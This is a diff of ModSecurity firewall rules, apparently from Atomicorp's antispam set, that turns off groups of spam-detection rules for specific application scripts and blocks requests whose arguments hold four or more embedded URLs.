+SecMarker END_RULES_95126
+
+SecRule REQUEST_FILENAME "/tbl_replace\.php" "phase:2,id:95127,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/admin\.pl" "phase:2,id:95128,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/do_siteinput_aed\.php" "phase:2,id:95129,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/submitticket\.php" "phase:2,id:95130,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/blacklist\.php" "phase:2,id:95131,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/wysiwyg/save\.php" "phase:2,id:95132,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/add_static_cgi\.php" "phase:2,id:95133,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:95134,t:none,pass,nolog,skipAfter:END_RULES_95134"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:description|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/|!ARGS:homepage|!ARGS:mode|!ARGS:data[About][content]|!ARGS:data[Contact][content]|!ARGS:config|!ARGS:signature|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/|!ARGS:template|!ARGS:/header/|!ARGS:/footer/|!ARGS:/blog_text/ "\[ ?(url|link) ?= ?\"? ?https?://.*\[ ?(url|link) ?= ?\"? ?https?://.*\[ ?(url|link) ?= ?\"? ?https?://.*\[ ?(url|link) ?= ?\"? ?https?:/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,id:300081,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam: Multiple embedded urls in argument (Disable if you wish to allow 4 or more URLs in a post)',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_RULES_95134
+
+SecRule REQUEST_FILENAME "/course/modedit\.php" "phase:2,id:95135,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/livehelp/include/tracker\.php" "phase:2,id:95136,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/leads/orders\.php" "phase:2,id:95137,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/search\.php" "phase:2,id:95138,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/tce_db\.php" "phase:2,id:95139,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/sysext/rtehtmlarea/" "phase:2,id:95140,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/parse_html\.php" "phase:2,id:95141,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/index\.php/zblocks/adminhtml_zblocks/" "phase:2,id:95142,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/newticket\.php" "phase:2,id:95143,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/mailer\.php" "phase:2,id:95144,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/serverftpprocess\.php" "phase:2,id:95145,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/product\.php" "phase:2,id:95146,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/csnewsletter\.cgi" "phase:2,id:95147,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/cm/ui\.php4" "phase:2,id:95148,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/grades\.aspx" "phase:2,id:95149,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/content/ajax/page\.php" "phase:2,id:95150,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/filemanager/browser/default/browser\.htm" "phase:2,id:95151,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/noticias/submit\.php" "phase:2,id:95152,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/pncrtl/options\.php" "phase:2,id:95153,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/wp-login\.php" "phase:2,id:95154,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300032"
+
+SecRule REQUEST_FILENAME "/stores/edit_item\.php" "phase:2,id:95155,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/cart\.php" "phase:2,id:95156,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/spc\.php" "phase:2,id:95157,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/private\.php" "phase:2,id:95158,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/thumb\.php" "phase:2,id:95159,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/dbpro\.cgi" "phase:2,id:95160,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/widget\.php" "phase:2,id:95161,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/marque_list\.php" "phase:2,id:95162,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/createsite\.php" "phase:2,id:95163,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/insert\.php" "phase:2,id:95164,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/chat/server\.php" "phase:2,id:95165,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/ajax\.php" "phase:2,id:95166,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/modules\.php" "phase:2,id:95167,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/ajax\.savephotos\.php" "phase:2,id:95168,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/cgi-bin/database/portal\.pl" "phase:2,id:95169,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/callback\.php" "phase:2,id:95170,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/cataloger\.image\.php" "phase:2,id:95171,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/template\.php" "phase:2,id:95172,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:95173,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/webmail\.aspx" "phase:2,id:95174,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/xml-processing\.aspx" "phase:2,id:95175,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/element/chunk\.php" "phase:2,id:95176,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/tiki-adminusers\.php" "phase:2,id:95177,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/res-bev\.php" "phase:2,id:95178,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/reservation_confirm\.php" "phase:2,id:95179,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/eecms\.php" "phase:2,id:95180,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/clientsprofile\.php" "phase:2,id:95181,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/banner_manager\.php" "phase:2,id:95182,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:95183,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/mailtemplateeditaction\.php" "phase:2,id:95184,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
+SecRule REQUEST_FILENAME "/property-edit\.php" "phase:2,id:95185,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=300000-300081,ctl:ruleRemovebyID=300183-300189,ctl:ruleRemovebyID=300299,ctl:ruleRemovebyID=300300,ctl:ruleRemovebyID=301311,ctl:ruleRemovebyID=301313,ctl:ruleRemovebyID=300201,ctl:ruleRemovebyID=300299-300304,ctl:ruleRemovebyID=300182,ctl:ruleRemovebyID=300134"
+
